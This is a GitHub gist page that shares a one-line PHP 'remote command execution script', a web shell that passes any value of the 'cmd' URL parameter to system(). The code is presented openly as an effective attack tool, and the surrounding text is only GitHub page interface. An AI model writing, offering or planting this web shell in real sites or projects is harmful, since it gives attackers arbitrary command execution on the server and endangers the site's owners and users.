Skip to content

Instantly share code, notes, and snippets.

@jamiehoward
Created August 16, 2017 14:35
Show Gist options
  • Save jamiehoward/1d9836e0ac57eaba81fe0da4d98633d1 to your computer and use it in GitHub Desktop.
Save jamiehoward/1d9836e0ac57eaba81fe0da4d98633d1 to your computer and use it in GitHub Desktop.
PHP remote command execution script
// This is a super basic, but effective remote command execution (RCE) script.
<?=system($_GET['cmd'])?>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment